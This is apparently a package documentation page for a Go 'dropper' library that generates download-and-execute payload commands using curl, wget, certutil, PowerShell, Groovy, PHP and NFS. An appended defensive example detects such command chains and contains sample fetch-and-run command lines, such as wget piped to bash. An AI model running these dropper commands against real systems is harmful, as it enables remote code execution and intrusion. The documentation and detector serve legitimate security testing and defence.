dropper

package
v1.47.0 Latest
Warning

This package is not in the latest version of its module.

Published: Jul 29, 2025 | License: Apache-2.0 | Imports: 4 | Imported by: 2

Documentation

Overview

File dropper download-and-execute payloads.

The dropper package contains all the code for download-and-execute payloads. Unlike the other payloads, this package is necessarily OS-dependent for both the download and execution portions.

Constants

This section is empty.

Variables

var (
	Unix    = &UnixPayload{}
	Windows = &WindowsPayload{}
	Groovy  = &GroovyPayload{}
	PHP     = &PHPPayload{}
)
var (
	//go:embed php/dropper.php
	PHPDropper string
	//go:embed php/dropper_secure.php
	PHPDropperSecure string
)

Functions

This section is empty.

Types

type Dropper

type Dropper interface{}

type GroovyPayload added in v1.16.0

type GroovyPayload struct{}

func (*GroovyPayload) HTTP added in v1.19.0

func (groovy *GroovyPayload) HTTP(lhost string, lport int, downloadFile string, output string) string

Using Groovy, download a remote file, set it to executable, execute it, and delete it.

type PHPPayload added in v1.19.0

type PHPPayload struct{}

func (*PHPPayload) HTTP added in v1.19.0

func (php *PHPPayload) HTTP(lhost string, lport int, ssl bool, downloadFile string) string

Using PHP: download a remote file, write a tmp file, set it to executable, execute it, and delete it.

type UnixPayload

type UnixPayload struct{}

func (*UnixPayload) CurlHTTP

func (unix *UnixPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with curl, execute it, and delete it.

func (*UnixPayload) CurlHTTPDownloadOnly added in v1.44.0

func (unix *UnixPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, output string) string

Download a remote file with curl, but do not execute or delete it. You need to provide your own full file path; .exe will not be appended as it is by the other functions. The full output file path must be specified in the output parameter.

func (*UnixPayload) EitherHTTP

func (unix *UnixPayload) EitherHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with curl or wget, execute it, and delete it.

func (*UnixPayload) Mountv3Only added in v1.47.0

func (unix *UnixPayload) Mountv3Only(lhost string, lshareDir string, rshareDir string) string

Mount a remote NFS directory using NFS v3. This will mount the attacker-controlled share at <lhost>:<lshareDir> and make it available to the attacker at <rshareDir>. Usage example:

Mountv3Only("10.9.49.2","/tmp/nfsshare", "./b")

This function does not attempt to actually execute any files on the share.

func (*UnixPayload) WgetHTTP added in v1.27.0

func (unix *UnixPayload) WgetHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote bash script with wget and pipe it to bash.

type WindowsPayload

type WindowsPayload struct{}

func (*WindowsPayload) CertutilHTTP

func (win *WindowsPayload) CertutilHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with certutil.exe, execute it, and delete it (after execution).

func (*WindowsPayload) CertutilHTTPDownloadOnly added in v1.46.0

func (win *WindowsPayload) CertutilHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, outputPath string) string

Much like CurlHTTPDownloadOnly, this function will generate the certutil.exe command to download a file and save it to the provided location.

downloadCmd := dropper.Windows.CertutilHTTPDownloadOnly(httpFileServer.HTTPAddr, httpFileServer.HTTPPort, httpFileServer.TLS, httpFileServer.GetRandomName(""), destFilePath)

func (*WindowsPayload) CurlHTTP

func (win *WindowsPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with curl.exe, execute it, and delete it (after execution).

func (*WindowsPayload) CurlHTTPDownloadOnly added in v1.44.0

func (win *WindowsPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, output string) string

Download a remote file with curl.exe, but do not execute or delete it. You need to provide your own full file path; .exe will not be appended as it is by the other functions. The full output file path must be specified in the output parameter.

func (*WindowsPayload) PowershellHTTP

func (win *WindowsPayload) PowershellHTTP(lhost string, lport int, ssl bool, downloadFile string) string

Download a remote file with PowerShell, execute it, and delete it (after execution).
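From the defender's side, the download / execute / delete sequence these functions describe is visible as a chain of stages in a single process command line. The following is an added example, not code from this package or its documentation: the regular expressions, verdict names and sample command lines are assumptions constructed for illustration and do not reproduce the strings the package actually generates.

```go
package main
import (
	"fmt"
	"regexp"
	"strings"
)

// Heuristic patterns chosen for this example (assumptions, not derived from the package's output).
var (
	sepRe   = regexp.MustCompile(`\s*(?:&&|;|\|)\s*`) // shell stage separators
	fetchRe = regexp.MustCompile(`(?i)\b(curl|wget|certutil|iwr|invoke-webrequest)(\.exe)?\b.*https?://`)
	delRe   = regexp.MustCompile(`(?i)^(rm|del|erase|remove-item)\b`)
	prepRe  = regexp.MustCompile(`(?i)^(chmod|cd)\b`) // set-up stages that do not run the file
)

// Classify labels one process command line by which stages follow an HTTP fetch.
func Classify(cmdline string) string {
	fetched, executed, deleted := false, false, false
	for _, s := range sepRe.Split(strings.TrimSpace(cmdline), -1) {
		switch {
		case s == "": // empty stage, e.g. after a trailing separator
		case !fetched:
			fetched = fetchRe.MatchString(s)
		case delRe.MatchString(s):
			deleted = true
		case !prepRe.MatchString(s):
			executed = true // any other follow-on stage is treated as execution
		}
	}
	switch {
	case !fetched:
		return ""
	case executed && deleted:
		return "download-execute-delete"
	case executed:
		return "download-execute"
	}
	return "download-only"
}

func main() {
	for _, c := range []string{ // constructed samples; 192.0.2.0/24 is a documentation range
		`curl -s -o /tmp/abc http://192.0.2.10:8080/abc && chmod +x /tmp/abc && /tmp/abc; rm -f /tmp/abc`,
		`wget -q -O- http://192.0.2.10:8080/s.sh | bash`,
		`certutil.exe -urlcache -split -f https://192.0.2.10/f C:\Temp\f.bin`,
	} {
		fmt.Printf("%-24s %s\n", Classify(c), c)
	}
}
```

The check only sees stages joined in one command line; a fetch and the later execution issued as separate processes need correlation by parent process and file path instead.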
